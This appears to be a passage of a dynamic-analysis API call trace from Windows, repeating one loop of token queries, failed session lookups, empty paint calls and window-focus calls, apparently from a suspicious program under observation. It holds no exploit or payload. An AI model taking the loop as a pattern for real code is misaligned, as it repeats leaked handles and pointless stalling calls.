[0072.271] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.271] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.271] WTSFreeMemory (pMemory=0x0) [0072.271] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.271] TextOutW (hdc=0x0, x=1944, y=4624, lpString="", c=0) returned 1 [0072.271] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.271] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.271] GetTickCount () returned 0x1f289 [0072.272] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.272] SetForegroundWindow (hWnd=0x0) returned 0 [0072.272] BringWindowToTop (hWnd=0x0) returned 0 [0072.272] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x53c) returned 1 [0072.272] GetTokenInformation (in: TokenHandle=0x53c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.272] GetLastError () returned 0x7a [0072.272] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.272] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.273] WTSFreeMemory (pMemory=0x0) [0072.273] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.273] TextOutW (hdc=0x0, x=1954, y=4649, lpString="", c=0) returned 1 [0072.273] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.273] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.273] GetTickCount () returned 0x1f289 [0072.274] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.274] SetForegroundWindow (hWnd=0x0) returned 0 [0072.275] BringWindowToTop (hWnd=0x0) returned 0 [0072.275] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x540) returned 1 [0072.275] GetTokenInformation (in: TokenHandle=0x540, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.275] GetLastError () returned 0x7a [0072.275] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.275] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.275] WTSFreeMemory (pMemory=0x0) [0072.275] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.275] TextOutW (hdc=0x0, x=1964, y=4674, lpString="", c=0) returned 1 [0072.275] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.276] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.276] GetTickCount () returned 0x1f289 [0072.276] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.276] SetForegroundWindow (hWnd=0x0) returned 0 [0072.276] BringWindowToTop (hWnd=0x0) returned 0 [0072.276] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x544) returned 1 [0072.277] GetTokenInformation (in: TokenHandle=0x544, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.277] GetLastError () returned 0x7a [0072.277] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.277] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.277] WTSFreeMemory (pMemory=0x0) [0072.277] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.277] TextOutW (hdc=0x0, x=1974, y=4699, lpString="", c=0) returned 1 [0072.277] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.277] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.277] GetTickCount () returned 0x1f289 [0072.278] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.278] SetForegroundWindow (hWnd=0x0) returned 0 [0072.279] BringWindowToTop (hWnd=0x0) returned 0 [0072.279] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x548) returned 1 [0072.279] GetTokenInformation (in: TokenHandle=0x548, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.279] GetLastError () returned 0x7a [0072.279] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.279] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.279] WTSFreeMemory (pMemory=0x0) [0072.279] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.280] TextOutW (hdc=0x0, x=1984, y=4724, lpString="", c=0) returned 1 [0072.280] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.280] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.280] GetTickCount () returned 0x1f289 [0072.281] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.281] SetForegroundWindow (hWnd=0x0) returned 0 [0072.281] BringWindowToTop (hWnd=0x0) returned 0 [0072.281] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x54c) returned 1 [0072.281] GetTokenInformation (in: TokenHandle=0x54c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.281] GetLastError () returned 0x7a [0072.281] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.281] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.282] WTSFreeMemory (pMemory=0x0) [0072.282] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.282] TextOutW (hdc=0x0, x=1994, y=4749, lpString="", c=0) returned 1 [0072.282] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.282] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.282] GetTickCount () returned 0x1f289 [0072.288] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.288] SetForegroundWindow (hWnd=0x0) returned 0 [0072.288] BringWindowToTop (hWnd=0x0) returned 0 [0072.288] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x550) returned 1 [0072.288] GetTokenInformation (in: TokenHandle=0x550, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.288] GetLastError () returned 0x7a [0072.288] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.288] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.289] WTSFreeMemory (pMemory=0x0) [0072.289] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.289] TextOutW (hdc=0x0, x=2004, y=4774, lpString="", c=0) returned 1 [0072.289] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.289] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.289] GetTickCount () returned 0x1f298 [0072.291] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.291] SetForegroundWindow (hWnd=0x0) returned 0 [0072.291] BringWindowToTop (hWnd=0x0) returned 0 [0072.291] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x554) returned 1 [0072.291] GetTokenInformation (in: TokenHandle=0x554, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.291] GetLastError () returned 0x7a [0072.291] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.291] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.292] WTSFreeMemory (pMemory=0x0) [0072.292] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.292] TextOutW (hdc=0x0, x=2014, y=4799, lpString="", c=0) returned 1 [0072.292] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.292] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.292] GetTickCount () returned 0x1f298 [0072.293] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.293] SetForegroundWindow (hWnd=0x0) returned 0 [0072.293] BringWindowToTop (hWnd=0x0) returned 0 [0072.293] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x558) returned 1 [0072.293] GetTokenInformation (in: TokenHandle=0x558, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.293] GetLastError () returned 0x7a [0072.293] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.293] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.294] WTSFreeMemory (pMemory=0x0) [0072.294] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.294] TextOutW (hdc=0x0, x=2024, y=4824, lpString="", c=0) returned 1 [0072.294] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.294] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.294] GetTickCount () returned 0x1f298 [0072.295] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.295] SetForegroundWindow (hWnd=0x0) returned 0 [0072.295] BringWindowToTop (hWnd=0x0) returned 0 [0072.295] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x55c) returned 1 [0072.295] GetTokenInformation (in: TokenHandle=0x55c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.295] GetLastError () returned 0x7a [0072.295] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.295] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.296] WTSFreeMemory (pMemory=0x0) [0072.296] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.296] TextOutW (hdc=0x0, x=2034, y=4849, lpString="", c=0) returned 1 [0072.296] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.296] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.296] GetTickCount () returned 0x1f298 [0072.297] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.297] SetForegroundWindow (hWnd=0x0) returned 0 [0072.297] BringWindowToTop (hWnd=0x0) returned 0 [0072.297] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x560) returned 1 [0072.297] GetTokenInformation (in: TokenHandle=0x560, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.297] GetLastError () returned 0x7a [0072.297] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.297] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.298] WTSFreeMemory (pMemory=0x0) [0072.298] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.298] TextOutW (hdc=0x0, x=2044, y=4874, lpString="", c=0) returned 1 [0072.298] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.298] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.298] GetTickCount () returned 0x1f298 [0072.299] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.299] SetForegroundWindow (hWnd=0x0) returned 0 [0072.299] BringWindowToTop (hWnd=0x0) returned 0 [0072.299] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x564) returned 1 [0072.299] GetTokenInformation (in: TokenHandle=0x564, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.299] GetLastError () returned 0x7a [0072.299] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.299] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.300] WTSFreeMemory (pMemory=0x0) [0072.300] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.300] TextOutW (hdc=0x0, x=2054, y=4899, lpString="", c=0) returned 1 [0072.300] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.300] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.300] GetTickCount () returned 0x1f2a8 [0072.301] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.301] SetForegroundWindow (hWnd=0x0) returned 0 [0072.301] BringWindowToTop (hWnd=0x0) returned 0 [0072.301] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x568) returned 1 [0072.302] GetTokenInformation (in: TokenHandle=0x568, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.302] GetLastError () returned 0x7a [0072.302] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.302] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.302] WTSFreeMemory (pMemory=0x0) [0072.302] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.302] TextOutW (hdc=0x0, x=2064, y=4924, lpString="", c=0) returned 1 [0072.302] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.302] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.302] GetTickCount () returned 0x1f2a8 [0072.304] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.304] SetForegroundWindow (hWnd=0x0) returned 0 [0072.304] BringWindowToTop (hWnd=0x0) returned 0 [0072.304] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x56c) returned 1 [0072.304] GetTokenInformation (in: TokenHandle=0x56c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.304] GetLastError () returned 0x7a [0072.304] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.304] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.305] WTSFreeMemory (pMemory=0x0) [0072.305] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.305] TextOutW (hdc=0x0, x=2074, y=4949, lpString="", c=0) returned 1 [0072.305] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.305] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.305] GetTickCount () returned 0x1f2a8 [0072.306] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.306] SetForegroundWindow (hWnd=0x0) returned 0 [0072.306] BringWindowToTop (hWnd=0x0) returned 0 [0072.306] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x570) returned 1 [0072.306] GetTokenInformation (in: TokenHandle=0x570, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.306] GetLastError () returned 0x7a [0072.306] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.306] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.306] WTSFreeMemory (pMemory=0x0) [0072.306] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.307] TextOutW (hdc=0x0, x=2084, y=4974, lpString="", c=0) returned 1 [0072.307] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.307] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.307] GetTickCount () returned 0x1f2a8 [0072.307] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.307] SetForegroundWindow (hWnd=0x0) returned 0 [0072.307] BringWindowToTop (hWnd=0x0) returned 0 [0072.308] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x574) returned 1 [0072.308] GetTokenInformation (in: TokenHandle=0x574, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.308] GetLastError () returned 0x7a [0072.308] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.308] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.308] WTSFreeMemory (pMemory=0x0) [0072.308] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.308] TextOutW (hdc=0x0, x=2094, y=4999, lpString="", c=0) returned 1 [0072.308] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.308] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.308] GetTickCount () returned 0x1f2a8 [0072.309] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.309] SetForegroundWindow (hWnd=0x0) returned 0 [0072.309] BringWindowToTop (hWnd=0x0) returned 0 [0072.309] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x578) returned 1 [0072.309] GetTokenInformation (in: TokenHandle=0x578, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.309] GetLastError () returned 0x7a [0072.309] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.309] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.310] WTSFreeMemory (pMemory=0x0) [0072.310] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.310] TextOutW (hdc=0x0, x=2104, y=5024, lpString="", c=0) returned 1 [0072.310] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.310] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.310] GetTickCount () returned 0x1f2a8 [0072.311] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.311] SetForegroundWindow (hWnd=0x0) returned 0 [0072.311] BringWindowToTop (hWnd=0x0) returned 0 [0072.311] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x57c) returned 1 [0072.311] GetTokenInformation (in: TokenHandle=0x57c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.311] GetLastError () returned 0x7a [0072.311] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.312] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.312] WTSFreeMemory (pMemory=0x0) [0072.312] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.312] TextOutW (hdc=0x0, x=2114, y=5049, lpString="", c=0) returned 1 [0072.312] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.312] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.312] GetTickCount () returned 0x1f2a8 [0072.313] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.314] SetForegroundWindow (hWnd=0x0) returned 0 [0072.314] BringWindowToTop (hWnd=0x0) returned 0 [0072.314] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x580) returned 1 [0072.314] GetTokenInformation (in: TokenHandle=0x580, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.314] GetLastError () returned 0x7a [0072.314] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.314] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.314] WTSFreeMemory (pMemory=0x0) [0072.314] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.314] TextOutW (hdc=0x0, x=2124, y=5074, lpString="", c=0) returned 1 [0072.314] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.315] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.315] GetTickCount () returned 0x1f2a8 [0072.317] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.317] SetForegroundWindow (hWnd=0x0) returned 0 [0072.318] BringWindowToTop (hWnd=0x0) returned 0 [0072.318] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x584) returned 1 [0072.318] GetTokenInformation (in: TokenHandle=0x584, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.318] GetLastError () returned 0x7a [0072.318] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.318] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.318] WTSFreeMemory (pMemory=0x0) [0072.318] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.318] TextOutW (hdc=0x0, x=2134, y=5099, lpString="", c=0) returned 1 [0072.318] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.319] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.319] GetTickCount () returned 0x1f2b7 [0072.319] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.319] SetForegroundWindow (hWnd=0x0) returned 0 [0072.319] BringWindowToTop (hWnd=0x0) returned 0 [0072.320] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x588) returned 1 